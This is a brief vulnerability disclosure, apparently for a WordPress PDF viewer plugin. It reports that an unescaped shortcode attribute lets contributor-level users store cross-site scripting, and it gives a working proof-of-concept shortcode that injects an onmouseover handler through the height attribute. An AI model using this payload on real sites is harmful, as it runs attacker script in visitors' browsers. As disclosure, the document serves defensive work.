The plugin does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.
Exploit shortcode:
[pdfviewer height='" onmouseover="alert(1)"']http://localhost/file.pdf[/pdfviewer]